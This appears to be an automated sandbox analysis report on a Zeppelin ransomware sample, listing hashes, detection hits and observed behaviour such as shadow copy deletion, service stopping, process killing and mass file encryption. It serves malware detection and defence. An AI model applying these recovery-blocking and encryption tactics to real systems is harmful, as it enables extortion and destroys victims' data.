Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
26-02-2024 17:44
Behavioral task
behavioral1
Sample
2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
Resource
win10v2004-20240221-en
General
-
Target
2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
-
Size
227KB
-
MD5
b2a478d698a2789ce04d8d54158a7d64
-
SHA1
49cf775b235dd75dde60a70af385fff93a665e9c
-
SHA256
a2ef8ef7be1ef11158f7d406e96c240178068b9692ec5e5ce19f9239345ee825
-
SHA512
6b9b62d1f0610fff7cd79fb10e44a50739405043d168ca240a7bde22eea231ed74f20d77a99b2fe1d65f14581463d0fc0ca61e9fc54ca9e9c6b8ab23d7c746eb
-
SSDEEP
6144:eia1C9bP2XUJmcCvyr/2H64DQFu/U3buRKlemZ9DnGAefIC8+:eq9bP2Rfo/2a4DQFu/U3buRKlemZ9DnY
Malware Config
Extracted
C:\$Recycle.Bin\S-1-5-21-2248906074-2862704502-246302768-1000\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT
https://tox.chat/download.html
Signatures
-
Detects Zeppelin payload 7 IoCs
resource yara_rule behavioral1/memory/2680-8-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2700-10380-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2692-12264-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2700-22045-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2692-24692-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2692-30829-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin behavioral1/memory/2700-30855-0x00000000011F0000-0x0000000001334000-memory.dmp family_zeppelin -
Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detects command variations typically used by ransomware 1 IoCs
resource yara_rule behavioral1/files/0x000b000000012252-13.dat INDICATOR_SUSPICIOUS_GENRansomware -
Renames multiple (7439) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1892 notepad.exe -
Enumerates connected drives 3 TTPs 32 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\X: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\P: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\M: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\J: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\U: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\T: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\Z: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\W: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\L: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\H: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\S: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\Q: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\E: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\A: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\V: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\R: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\O: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\N: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\K: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\I: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\G: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\N: vssadmin.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00531_.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0292020.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00110_.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityResume.Dotx 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02265_.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\XLMACRO.CHM 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CERT.XML 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15277_.GIF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPQUOT.XML.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4B.GIF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199727.WMF.lock.2F6-A2A-068 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 592 sc.exe 2384 sc.exe 308 sc.exe 2168 sc.exe 920 sc.exe 872 sc.exe 1248 sc.exe 2768 sc.exe 1468 sc.exe 1244 sc.exe 2660 sc.exe 2540 sc.exe 2620 sc.exe 1956 sc.exe 472 sc.exe 1292 sc.exe 284 sc.exe 2404 sc.exe 2308 sc.exe 1244 sc.exe 1500 sc.exe 1656 sc.exe 580 sc.exe 2184 sc.exe 2472 sc.exe 2596 sc.exe 1584 sc.exe 1792 sc.exe 1572 sc.exe 2272 sc.exe 1536 sc.exe 2256 sc.exe 1292 sc.exe 1984 sc.exe 772 sc.exe 2828 sc.exe 2256 sc.exe 848 sc.exe 2496 sc.exe 472 sc.exe 2188 sc.exe 896 sc.exe 1524 sc.exe 1832 sc.exe 1268 sc.exe 2160 sc.exe 1468 sc.exe 992 sc.exe 2172 sc.exe 1972 sc.exe 1404 sc.exe 2360 sc.exe 1364 sc.exe 2344 sc.exe 1592 sc.exe 992 sc.exe 1980 sc.exe 1248 sc.exe 1560 sc.exe 1460 sc.exe 2944 sc.exe 2176 sc.exe 1960 sc.exe 804 sc.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 2936 tasklist.exe 1256 tasklist.exe 992 tasklist.exe 696 tasklist.exe 2120 tasklist.exe 2196 tasklist.exe -
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1772 vssadmin.exe 2052 vssadmin.exe 2436 vssadmin.exe 636 vssadmin.exe 1408 vssadmin.exe 696 vssadmin.exe 2604 vssadmin.exe 2312 vssadmin.exe 2168 vssadmin.exe 2384 vssadmin.exe 2768 vssadmin.exe 2288 vssadmin.exe -
Kills process with taskkill 25 IoCs
pid Process 1560 taskkill.exe 2360 taskkill.exe 2948 taskkill.exe 2032 taskkill.exe 1472 taskkill.exe 2724 taskkill.exe 2696 taskkill.exe 1128 taskkill.exe 568 taskkill.exe 1744 taskkill.exe 2776 taskkill.exe 2228 taskkill.exe 2588 taskkill.exe 1436 taskkill.exe 1820 taskkill.exe 2568 taskkill.exe 1816 taskkill.exe 1780 taskkill.exe 2780 taskkill.exe 1740 taskkill.exe 1620 taskkill.exe 1744 taskkill.exe 2132 taskkill.exe 2136 taskkill.exe 1640 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2508 WMIC.exe Token: SeSecurityPrivilege 2508 WMIC.exe Token: SeTakeOwnershipPrivilege 2508 WMIC.exe Token: SeLoadDriverPrivilege 2508 WMIC.exe Token: SeSystemProfilePrivilege 2508 WMIC.exe Token: SeSystemtimePrivilege 2508 WMIC.exe Token: SeProfSingleProcessPrivilege 2508 WMIC.exe Token: SeIncBasePriorityPrivilege 2508 WMIC.exe Token: SeCreatePagefilePrivilege 2508 WMIC.exe Token: SeBackupPrivilege 2508 WMIC.exe Token: SeRestorePrivilege 2508 WMIC.exe Token: SeShutdownPrivilege 2508 WMIC.exe Token: SeDebugPrivilege 2508 WMIC.exe Token: SeSystemEnvironmentPrivilege 2508 WMIC.exe Token: SeRemoteShutdownPrivilege 2508 WMIC.exe Token: SeUndockPrivilege 2508 WMIC.exe Token: SeManageVolumePrivilege 2508 WMIC.exe Token: 33 2508 WMIC.exe Token: 34 2508 WMIC.exe Token: 35 2508 WMIC.exe Token: SeIncreaseQuotaPrivilege 2544 WMIC.exe Token: SeSecurityPrivilege 2544 WMIC.exe Token: SeTakeOwnershipPrivilege 2544 WMIC.exe Token: SeLoadDriverPrivilege 2544 WMIC.exe Token: SeSystemProfilePrivilege 2544 WMIC.exe Token: SeSystemtimePrivilege 2544 WMIC.exe Token: SeProfSingleProcessPrivilege 2544 WMIC.exe Token: SeIncBasePriorityPrivilege 2544 WMIC.exe Token: SeCreatePagefilePrivilege 2544 WMIC.exe Token: SeBackupPrivilege 2544 WMIC.exe Token: SeRestorePrivilege 2544 WMIC.exe Token: SeShutdownPrivilege 2544 WMIC.exe Token: SeDebugPrivilege 2544 WMIC.exe Token: SeSystemEnvironmentPrivilege 2544 WMIC.exe Token: SeRemoteShutdownPrivilege 2544 WMIC.exe Token: SeUndockPrivilege 2544 WMIC.exe Token: SeManageVolumePrivilege 2544 WMIC.exe Token: 33 2544 WMIC.exe Token: 34 2544 WMIC.exe Token: 35 2544 WMIC.exe Token: SeBackupPrivilege 1240 vssvc.exe Token: SeRestorePrivilege 1240 vssvc.exe Token: SeAuditPrivilege 1240 vssvc.exe Token: SeIncreaseQuotaPrivilege 2544 WMIC.exe Token: SeSecurityPrivilege 2544 WMIC.exe Token: SeTakeOwnershipPrivilege 2544 WMIC.exe Token: SeLoadDriverPrivilege 2544 WMIC.exe Token: SeSystemProfilePrivilege 2544 WMIC.exe Token: SeSystemtimePrivilege 2544 WMIC.exe Token: SeProfSingleProcessPrivilege 2544 WMIC.exe Token: SeIncBasePriorityPrivilege 2544 WMIC.exe Token: SeCreatePagefilePrivilege 2544 WMIC.exe Token: SeBackupPrivilege 2544 WMIC.exe Token: SeRestorePrivilege 2544 WMIC.exe Token: SeShutdownPrivilege 2544 WMIC.exe Token: SeDebugPrivilege 2544 WMIC.exe Token: SeSystemEnvironmentPrivilege 2544 WMIC.exe Token: SeRemoteShutdownPrivilege 2544 WMIC.exe Token: SeUndockPrivilege 2544 WMIC.exe Token: SeManageVolumePrivilege 2544 WMIC.exe Token: 33 2544 WMIC.exe Token: 34 2544 WMIC.exe Token: 35 2544 WMIC.exe Token: SeIncreaseQuotaPrivilege 2508 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
